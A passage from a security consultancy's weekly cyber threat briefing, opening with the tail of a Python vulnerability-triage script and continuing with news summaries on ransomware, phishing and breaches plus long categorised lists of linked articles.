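    """References of findings already past their assumed SLA, in work order."""
    return [row["ref"] for row in triage(findings, today) if row["overdue"]]


# Constructed sample findings; the references are placeholders, not real CVEs.
TODAY = date(2024, 10, 25)
SAMPLE = [
    Finding("F-1", "medium", TODAY - timedelta(days=3), exploited=True, internet_facing=True),
    Finding("F-2", "critical", TODAY - timedelta(days=2), exploited=False, internet_facing=False),
    Finding("F-3", "high", TODAY - timedelta(days=10), exploited=False, internet_facing=True),
    Finding("F-4", "low", TODAY - timedelta(days=40), exploited=False, internet_facing=False),
    Finding("F-5", "critical", TODAY - timedelta(days=1), exploited=True, internet_facing=False),
]

if __name__ == "__main__":
    for row in triage(SAMPLE, TODAY):
        print(row)
```

The key deliberately ranks an exploited medium-severity flaw on an internet-facing host above an exploited critical on an internal one: confirmed exploitation and exposure are what the shrinking timeline punishes, and CVSS alone would order them the other way. Adjust SLA_DAYS and the key to your own risk appetite, and feed real exploitation status from a source such as a known-exploited-vulnerabilities list rather than hand-set flags.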
Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware
A new report highlights the rising threat of ransomware attacks stemming from software supply chain vulnerabilities, with 62% of small and medium-sized businesses impacted. The findings reveal that 91% of businesses are concerned about ransomware affecting their downstream partners, with nearly half considering changing vendors. The role of AI in cyber attacks is also increasing, with 55% of businesses feeling more at risk due to AI-enhanced threats. Despite the challenges, 97% of those affected managed to restore their data, though 46% had to pay a ransom, with 31% paying over $1 million.
Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches
Despite global security spending set to reach $215 billion in 2024, 44% of CISOs reported failing to detect data breaches over the past year. A key issue is limited visibility, with 70% acknowledging their tools fall short in identifying breaches across hybrid cloud infrastructure. Gaining full visibility into encrypted and lateral traffic is critical, as 93% of malware hides there. CISOs are also overwhelmed by tool proliferation, with 60% prioritising tool consolidation. Concerns around AI-driven cyber attacks are rising, and 46% plan to implement AI to address visibility gaps and improve detection capabilities.
Organisations Need to Better Prepare to Recover Swiftly from Cyber Attacks, New NCSC Head Warns
The new head of the UK’s National Cyber Security Centre, Dr Richard Horne, has warned of escalating cyber threats, and the importance of preparing organisations to recover swiftly from cyber attacks. In 2024 alone, the NCSC responded to 50% more major incidents compared to the previous year, with severe attacks tripling. This rise in threats is driven by the expanding cyber crime marketplace, lowering the barriers for attackers. Horne stressed the need for global collaboration and for security to be embedded in technology from the start.
Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks
Microsoft’s 2024 Digital Defence Report reveals a significant rise in identity-based cyber attacks, tracking 600 million attacks over the fiscal year. Despite 41% of enterprises adopting multi-factor authentication (MFA), attackers bypass MFA through infrastructure vulnerabilities. Password attacks, such as phishing and brute force methods, still account for over 99% of these incidents. Although attempted ransomware attacks surged by 2.75 times, successful data encryption fell by threefold. Notably, state-backed cyber criminal collaborations are growing, complicating attack attribution, while AI and passwordless authentication are highlighted as essential for future protection.
Over 90% of Phishing Campaigns Lead Victims to Malware
A recent Comcast Business report highlights phishing as the top cyber security threat in 2023, with over 2.6 billion interactions detected. More than 90% of these phishing attempts aimed to direct victims to sites hosting malware, emphasising the need for stronger anti-phishing measures and staff education. Remote services were the primary method for lateral movement, with over 409 million events detected. The report recommends adopting tools like endpoint detection and response (EDR) and managed detection and response (MDR) to help IT teams detect and respond to early-stage threats through real-time network monitoring.
Here’s How Attackers Are Getting Around Phishing Defences
Email security provider Egress' latest report reveals that cyber attackers are bypassing phishing defences by manipulating natural language processing (NLP) technologies used in email filters. They achieve this by inserting benign text, links, and other obfuscation techniques, allowing malicious emails to pass through undetected. Notably, 78% of malicious emails incorporate multiple evasion tactics. Attackers exploit weaknesses in email security systems, including slow processing times that may cause incomplete scans. This trend is concerning, as phishing remains a significant threat, contributing to 31% of all security incidents according to Verizon’s 2024 breach report.
Firm Hacked After Accidentally Hiring North Korean Cyber Criminal
A company was hacked after unknowingly hiring a North Korean cyber criminal as a remote IT worker. The individual, who falsified employment history and personal details, gained access to the company’s network, stole sensitive data, and later demanded a ransom in cryptocurrency. This incident highlights an increasing threat of North Korean workers infiltrating Western firms to fund their regime, with many cases emerging since 2022. While most of these workers are after steady income, this case marks a significant shift towards data theft and extortion from within company defences.
Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency
According to the Global Cyber Resilience Report 2024, 69% of organisations have paid ransoms this year, despite 77% having a 'do not pay' policy. Only 2% of firms can recover data within 24 hours, despite 98% setting that as their target. This highlights a major gap between perceived and actual cyber resilience. Organisations are unprepared for modern threats, with fewer than half implementing essential security measures like multi-factor authentication. To reduce risks, businesses must adopt modern data security practices, engage in realistic threat simulations, and invest in automated recovery systems to mitigate the growing threat of AI-driven cyber attacks.
October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme
October marks the 21st annual Cyber Security Awareness Month, highlighting the importance of user awareness in defending against cyber attacks. The US Cyber Security and Infrastructure Security Agency (CISA) reports that 90% of successful cyber attacks start with phishing, and Verizon notes that human factors are involved in 68% of breaches. This underscores the need for continuous training across all levels of an organisation. Key actions include using strong passwords, enabling multi-factor authentication, and maintaining up-to-date systems. It’s a good time to review or implement training programmes, ensuring they meet current standards and promote security awareness both at work and home.
Phishing Tactics: The Top Attacks Trends in 2024
Phishing attacks have evolved beyond email, with AI enabling more personalised and sophisticated tactics, such as voice cloning and deepfakes. Attackers increasingly combine phishing with other cyber attacks, like ransomware, to compromise entire networks. This can lead to data breaches, financial losses, and legal consequences under regulations like GDPR. Organisations must adopt a multi-layered defence strategy, combining employee training, multi-factor authentication, and advanced filtering tools. Regular incident response planning is also crucial to minimise the impact of phishing attacks, as techniques continue to grow more complex and harder to detect.
Sources:
https://www.helpnetsecurity.com/2024/10/16/time-to-exploit-vulnerabilities-2023/
https://www.techradar.com/pro/supply-chain-vulnerabilities-are-facilitating-a-surge-in-ransomware
https://www.helpnetsecurity.com/2024/10/18/cisos-security-tools/
https://www.infosecurity-magazine.com/news/cyber-threats-defend-ncsc-head/
https://cyberscoop.com/email-natural-language-obfuscation-phishing-egress/
https://www.bbc.co.uk/news/articles/ce8vedz4yk7o
https://www.jdsupra.com/legalnews/october-is-cybersecurity-awareness-5531410/
https://www.itpro.com/security/cyber-attacks/phishing-tactics-the-top-attacks-trends-in-year
Governance, Risk and Compliance
Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today
UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)
'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)
Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security
Cyber crime's constant rise is becoming everyone's problem - Help Net Security
The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)
A quarter of cyber security leaders are ready to quit (betanews.com)
Most businesses “overconfident and underprepared” for 2025 cyber threats – PCR (pcr-online.biz)
Why Cyber Security’s Core Focus Should Be Defending Data (govinfosecurity.com)
Cyber security compliance: the heavy burden of regulations on IT leaders - Raconteur
Return on cyber investment | Professional Security Magazine
What Cyber Security Leaders Can Learn From Golf (darkreading.com)
Cyber Security Awareness Month: How CISOs can engage, educate, and empower - Security Boulevard
CISOs' Privacy Responsibilities Keep Growing (darkreading.com)
What Is the ‘Most Pressing Concern’ for Cyber Professionals? (techrepublic.com)
While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
Threats
Ransomware, Extortion and Destructive Attacks
More Ransoms Being Paid and More Data Being Lost: Hornetsecurity - Security Boulevard
RansomHub becomes dominant ransomware group in Q3 2024 (securitybrief.co.nz)
Basic cyber hygiene still offers the best defence against ransomware | SC Media (scworld.com)
53% of survey respondents admit to paying over $500,000 ransom | Security Magazine
Are You Prepared for Ransomware IRL? - Security Boulevard
Ransomware Attacks Tripled for Microsoft Customers Last Year (tech.co)
Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar
Would banning ransomware insurance stop the scourge? • The Register
Schools under siege: from nation-states to ransomware gangs • The Register
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Ransomware Threats Surge with 31 New Groups in 2024 (techinformed.com)
Ransomware still a major threat despite disruption to RaaS groups (betanews.com)
Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar
Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert
INC ransomware rebranded to Lynx, say security researchers • The Register
Ransomware Victims
53% of survey respondents admit to paying over $500,000 ransom | Security Magazine
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Casio Confirms Ransomware Outage and Data Breach - Infosecurity Magazine (infosecurity-magazine.com)
Schools under siege: from nation-states to ransomware gangs • The Register
Casio says 'no prospect of recovery yet' after ransomware attack | TechCrunch
India’s biggest health insurer gets ransomware following data breach | TechRadar
Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)
BianLian ransomware claims attack on Boston Children's Health Physicians (bleepingcomputer.com)
Phishing & Email Based Attacks
How AI created an email security gap | SC Media (scworld.com)
Attackers are using QR codes sneakily crafted in ASCII and blob URLs in phishing emails | CSO Online
Here’s how attackers are getting around phishing defences | CyberScoop
Phishing tactics: The top attacks trends in 2024 | ITPro
Over 90% of phishing campaigns lead victims to malware | Security Magazine
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Be Aware of These Eight Underrated Phishing Techniques - SecurityWeek
Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
Firm hacked after accidentally hiring North Korean cyber criminal - BBC News
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Scammers use AI to create convincing Gmail phishing calls (appleinsider.com)
What is tailgating (piggybacking) and how to prevent it? | Definition from TechTarget
Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Artificial Intelligence
How AI created an email security gap | SC Media (scworld.com)
From Misuse to Abuse: AI Risks and Attacks (thehackernews.com)
World Economic Forum: AI, Quantum Require ‘Paradigm Shift’ in Security - Security Boulevard
What Is Deepfake Technology? Ultimate Guide To AI Manipulation (eweek.com)
AI is bringing XSS vulnerabilities back to the spotlight | CSO Online
Navigating the Cyber Security Risks of Shadow & Open-Source GenAI - Security Boulevard
LLMs Are a New Type of Insider Adversary (darkreading.com)
Anthropic flags AI's potential to 'automate sophisticated destructive cyber attacks' | ZDNET
Deepfake lovers swindle victims out of $46M in Hong Kong AI scam - Ars Technica
AI Report Finds 74% of Cyber Security Leaders Aware of Sensitive Data Risks | Business Wire
AI data collection under fire - Help Net Security
4 Frightening Things Coming For Security This Season (informationsecuritybuzz.com)
How to Mitigate the Impact of Rogue AI Risks | Trend Micro (US)
NY's Financial Regulator Releases AI Cyber Security Guidance - Law360
AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)
2FA/MFA
Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)
Malware
Over 90% of phishing campaigns lead victims to malware | Security Magazine
OpenAI confirms threat actors use ChatGPT to write malware (bleepingcomputer.com)
New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT (thehackernews.com)
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates (thehackernews.com)
New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)
Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack (thehackernews.com)
Fake Google Meet pages deliver infostealers - Help Net Security
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Bots/Botnets
How DDoS Botnet is used to Infect your Network? - Security Boulevard
Mobile
Over 200 malicious apps on Google Play downloaded millions of times (bleepingcomputer.com)
Which? warns UK users to keep mobile numbers to avoid security risks - Neowin
TrickMo’s Latest Trick - Stealing PINs And Unlock Patterns (informationsecuritybuzz.com)
The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar
Android banking trojan stealing money: no antivirus software can detect it | Cybernews
What to do if your iPhone or Android smartphone gets stolen? - Help Net Security
Not iPhones, but secure Android phones: that's what Trump's campaign uses - PhoneArena
Trump campaign gets 'unhackable' phones • The Register
Denial of Service/DoS/DDoS
A Deep Dive into DDoS Carpet-Bombing Attacks - Security Boulevard
How DDoS Botnet is used to Infect your Network? - Security Boulevard
Independent Russian news site rides out a week of DDoS incidents (therecord.media)
Largest DDoS Cloudflare Attack On Global Sectors Mitigated - Security Boulevard
Internet of Things – IoT
Hackers took over robovacs to chase pets and yell slurs - The Verge
Hackers Made Robot Vacuums Shout Racist Slurs in Their Owners’ Homes (pcmag.com)
The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar
Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek
Data Breaches/Leaks
Data breaches trigger increase in cyber insurance claims - Help Net Security
Cisco investigates breach after stolen data for sale on hacking forum (bleepingcomputer.com)
Data Breaches: The Not-So-Hidden Cost of Doing Business | Baker Donelson - JDSupra
Fidelity Investments Data Breach Impacts 77,000 Customers - SecurityWeek
US healthcare org admits up to 400k people's data stolen • The Register
Cisco confirms ongoing probe into alleged data breach • The Register
Contractor pays $300K to settle Medicare data breach • The Register
Casio confirms customer data stolen in a ransomware attack (bleepingcomputer.com)
Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)
Game Freak Confirms 1TB Data Leaked in Breach | MSSP Alert
Hundreds of thousands of CVs leaked - here's what we know | TechRadar
Organised Crime & Criminal Actors
Microsoft wants tougher punishments for cyber criminals • The Register
Cyber crime's constant rise is becoming everyone's problem - Help Net Security
Southeast Asian Cyber Crime Profits Fuel Shadow Economy (darkreading.com)
Microsoft logs 600 million identity attacks per day as threat actors collaborate more | ITPro
Escalating Cyber Threats Demand Stronger Global Defence and Cooperation - Microsoft On the Issues
The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)
Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)
Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek
Two alleged operators of Anonymous Sudan named, charged • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam
North Korean hackers steal $3B in crypto since 2017: report | Invezz
Radiant Capital Suffers $50M Loss in Second Major Hack - DailyCoin
Insider Risk and Insider Threats
The NHI management challenge: When employees leave - Help Net Security
LLMs Are a New Type of Insider Adversary (darkreading.com)
Insurance
Would banning ransomware insurance stop the scourge? • The Register
Data breaches trigger increase in cyber insurance claims - Help Net Security
Supply Chain and Third Parties
Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs
UK Public sector at risk from supply chain attacks, new report warns | ITPro
Cloud/SaaS
Why are we still confused about cloud security? | InfoWorld
Why companies are struggling to keep up with SaaS data protection - Help Net Security
Tenable releases report on cloud security (devx.com)
38% of organisations are at risk of critical exposures | Security Magazine
Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)
Outages
Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs
Identity and Access Management
The Invisible Army of Non-Human Identities (darkreading.com)
Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog
Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon
The NHI management challenge: When employees leave - Help Net Security
NHIs may be your biggest — and most neglected — security hole | CSO Online
Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)
Encryption
The CISO’s guide to establishing quantum resilience | CSO Online
The quantum dilemma: Game-changer or game-ender - Help Net Security
Chinese researchers claim quantum encryption attack • The Register
Linux and Open Source
New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)
Passwords, Credential Stuffing & Brute Force Attacks
How Hybrid Password Attacks Work and How to Defend Against Them (thehackernews.com)
The War on Passwords Is One Step Closer to Being Over | WIRED
FIDO Alliance is Standardizing Passkey Portability - Thurrott.com
Understand these seven password attacks and how to stop them (bleepingcomputer.com)
Are Password Managers Safe to Use? (Benefits, Risks & Best Practices) (techrepublic.com)
Social Media
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Training, Education and Awareness
Regulations, Fines and Legislation
NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)
EU cyber security bill NIS2 hits compliance deadline | Computer Weekly
European companies anxious over non-implementation of EU cyber rules | Euronews
What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)
NIS 2 Compliance Deadline Approaches: What You Need To Know (techrepublic.com)
Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)
Ireland to miss EU cyber security deadline (rte.ie)
Are Irish businesses ready for new cyber security rules? (rte.ie)
Only two EU countries meet NIS2 deadline - TechCentral.ie
Is your organisation ready for NIS2? | Intel 471
How NIS2 will impact sectors from healthcare to energy - Help Net Security
Ex-NCSC Chief: UK Cyber Incident Reporting a 'Good Step' (govinfosecurity.com)
Contractor pays $300K to settle Medicare data breach • The Register
AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)
New Cyber Security Rules Threaten Defence Industrial Base - Law360
NY's Financial Regulator Releases AI Cyber Security Guidance - Law360
Models, Frameworks and Standards
EU cyber security bill NIS2 hits compliance deadline | Computer Weekly
European companies anxious over non-implementation of EU cyber rules | Euronews
What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)
NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)
Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)
Only two EU countries meet NIS2 deadline - TechCentral.ie
Is your organisation ready for NIS2? | Intel 471
NIS2 Directive: Experts share their views on the cyber security law (telecomstechnews.com)
How NIS2 will impact sectors from healthcare to energy - Help Net Security
Data Protection
CISOs' Privacy Responsibilities Keep Growing (darkreading.com)
Is a CPO Still a CPO? Privacy Leadership's Evolving Role (darkreading.com)
Careers, Working in Cyber and Information Security
CISSP and CompTIA Security+ lead as most desired security credentials - Help Net Security
The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)
Breaking into Cyber Security: It's Never Too Late - IT Security Guru
A quarter of cyber security leaders are ready to quit (betanews.com)
Stagnant salaries risk growth of infosec sector | The Global Recruiter
Security leaders can't catch a break, with many on the verge of quitting | TechRadar
Five alternative paths to the CISO chair | SC Media (scworld.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
Cyber Security Careers Go Beyond Coding | NIST
SMBs are being hit hardest by cyber security skills gap | TechRadar
Law Enforcement Action and Take Downs
Dutch police dismantled dual dark web market 'Bohemia/Cannabia' (securityaffairs.com)
Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)
Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek
Two alleged operators of Anonymous Sudan named, charged • The Register
Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop
Microsoft wants tougher punishments for cyber criminals • The Register
Misinformation, Disinformation and Propaganda
How nation-states exploit political instability to launch cyber operations - Help Net Security
Flood of Election-Related Cyber Activity Unleashed (darkreading.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Nation-State Cyber Threats: The Hidden War on Infrastructure - Security Boulevard
Nation State Actors
How nation-states exploit political instability to launch cyber operations - Help Net Security
Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today
UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)
'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)
Schools under siege: from nation-states to ransomware gangs • The Register
China
Meet the Chinese 'Typhoon' hackers preparing for war | TechCrunch
China Accuses US of Fabricating Volt Typhoon to Hide Its Own Hacking Campaigns (thehackernews.com)
US lawmakers demand probe into China's Salt Typhoon hacks • The Register
White House forms emergency team to deal with China espionage hack | Stars and Stripes
Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)
UK Fears Chinese Hackers Compromised Critical Infrastructure (bloomberglaw.com)
Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek
Chinese researchers claim quantum encryption attack • The Register
Intel denies Chinese claims it helps US intelligence orgs • The Register
China trade group claims Intel ignore... - Mobile World Live
China infosec body slams Intel over chip security • The Register
Russia
Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Russia is actively scanning everything for known vulns • The Register
The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)
Uncle Sam puts $10M bounty on Russian troll farm Rybar • The Register
Independent Russian news site rides out a week of DDoS incidents (therecord.media)
The Door Closes on Kaspersky: Russia’s Tech World-Beater - CEPA
Russian court websites down after breach claimed by pro-Ukraine hackers (therecord.media)
Iran
Report: Iran cyber attacks against Israel surge after Gaza war (voanews.com)
Iran's APT34 Abuses MS Exchange (darkreading.com)
A cyber attack hit Iranian government sites and nuclear facilities (securityaffairs.com)
North Korea
Firm hacked after accidentally hiring North Korean cyber criminal - BBC News
North Korean hackers steal $3B in crypto since 2017: report | Invezz
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security
The Invisible Army of Non-Human Identities (darkreading.com)
SOC Teams: Threat Detection Tools Are Stifling Us (darkreading.com)
Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog
Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon
The dark side of API security - Help Net Security
Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek
FIDO Alliance is Standardizing Passkey Portability - Thurrott.com
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
CIOs want a platform that combines AI, networking, and security - Help Net Security
Why Continuous API Security is Essential for Modern Businesses - Security Boulevard
NHIs may be your biggest — and most neglected — security hole | CSO Online
Why companies are struggling to keep up with SaaS data protection - Help Net Security
Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar
Return on cyber investment | Professional Security Magazine
Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)
Hybrid Work Exposes New Vulnerabilities in Print Security (darkreading.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
What is Business Continuity Plan? How it Works! (cybersecuritynews.com)
Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru
Finance and Insurance API Security: A Critical Imperative - Security Boulevard
While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)
CISOs' strategies for managing a growing attack surface - Help Net Security
Reports Published in the Last Week
Other News
Microsoft wants tougher punishments for cyber criminals • The Register
Defenders must adapt to shrinking exploitation timelines - Help Net Security
The Lingering Beige Desktop Paradox (darkreading.com)
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
Most businesses “overconfident and underprepared” for 2025 cyber threats – PCR (pcr-online.biz)
Microsoft: K-12, Universities Face Thousands of Attacks (darkreading.com)
Breaking down government hacks: The rise of the modern kill chain (federalnewsnetwork.com)
British intelligence services to protect all UK schools from ransomware attacks (therecord.media)
Top 10 Countries with Best Cyber Security, Finland Ranked First - Life En.tempo.co
6 biggest healthcare security threats | CSO Online
Retail CISOs Take on More Risk to Foster Innovation (darkreading.com)
Marlink reports increase in maritime cyber threats - Port Technology International
Vulnerability Management
Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop
Google: 70% of exploited flaws disclosed in 2023 were zero-days (bleepingcomputer.com)
Russia is actively scanning everything for known vulns • The Register
Patch-22: The Catch of Waiting to Fix Cyber Security Vulnerabilities - Security Boulevard
How to defend against zero-day vulnerabilities | TechRadar
Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru
Zero-Days Account for Most Exploited Bugs in 2023 | MSSP Alert
Vulnerabilities
86k Fortinet devices still vulnerable to active exploits • The Register
WordPress Plugin Jetpack Patches Major Vulnerability Affecting 27 Million Sites (thehackernews.com)
Oracle Patches Over 200 Vulnerabilities With October 2024 CPU - SecurityWeek
Windows 11 bug steals 8.63GB of storage space that you can't get back | Windows Central
Windows 11's 2024 update is now also killing internet connections | PCWorld
Juniper Networks Patches Dozens of Vulnerabilities - SecurityWeek
Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)
Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert
Splunk Enterprise Update Patches Remote Code Execution Vulnerabilities - SecurityWeek
Vulnerable instances of Log4j still being used nearly 3 years later | SC Media (scworld.com)
Microsoft Patches Vulnerabilities in Power Platform, Imagine Cup Site - SecurityWeek
VMware fixes high-severity SQL injection CVE-2024-38814 in HCX (securityaffairs.com)
SolarWinds hardcoded credential now exploited in the wild • The Register
Fortinet Edge Devices Under Attack - Again - InfoRiskToday
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
Cisco Patches High-Severity Vulnerabilities in Analog Telephone Adapters - SecurityWeek
F5 BIG-IP Updates Patch High-Severity Elevation of Privilege Vulnerability - SecurityWeek
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Mozilla releases second Firefox 131 security update - gHacks Tech News
Recent Firefox Zero-Day Exploited Against Tor Browser Users - SecurityWeek
Chrome 130 Released with Fix for 17 Security Flaws (cybersecuritynews.com)
CISA Warns of Active Exploitation in SolarWinds Help Desk Software Vulnerability (thehackernews.com)
Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek
Iran's APT34 Abuses MS Exchange (darkreading.com)
Netgear WiFi Extender Vulnerability Let Attackers Inject Malicious Commands - Cyber Security News
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 11 October 2024
Black Arrow Cyber Threat Intelligence Briefing 11 October 2024:
-Your IT Systems Are Being Attacked. Are You Prepared?
-Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds
-Mounting Phishing Attacks Enabled by AI, Deepfakes
-AI is Most Serious Threat to Orgs, According to Security Professionals
-MI5 Chief Warns of Cyber Threats to the UK
-Walking the Tightrope Between Innovation and Risk
-Ransomware Severity Up 68% in First Half of 2024
-31 New Ransomware Groups in 12 Months
-Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report
-Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk
-UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan
-Cloud Security Risks Surge as 38% of Firms Face Exposures
-Insider Threat Damage Balloons as Visibility Gaps Widen
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Your IT Systems Are Being Attacked. Are You Prepared?
Recent cyber attacks are becoming more frequent and sophisticated, emphasising the need for executive-level engagement in cyber security. Yet many organisations remain unprepared, with CEOs often delegating responsibility to IT departments. A survey revealed that while increasing AI use is expected to lead to more breaches, four in five security officers plan to use AI for defence. Experts advise that CEOs should actively participate in cyber security planning, ask critical questions like 'What are we doing? Is it enough? How do we know?', and regularly review measures to avoid significant business disruptions and regulatory penalties.
Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds
The UK's National Cyber Security Centre (NCSC) has found that 80% of board members and security leaders are uncertain about who holds responsibility for cyber security in their organisations. This confusion stems from CISOs believing accountability lies with the board, while board members think it rests with CISOs. The NCSC's research highlighted that many board members lack in-depth cyber knowledge, leading to gaps in oversight. In response, the NCSC has published new guidance to help CISOs effectively communicate with boards, aiming to bridge this gap and reduce cyber risk across organisations.
Mounting Phishing Attacks Enabled by AI, Deepfakes
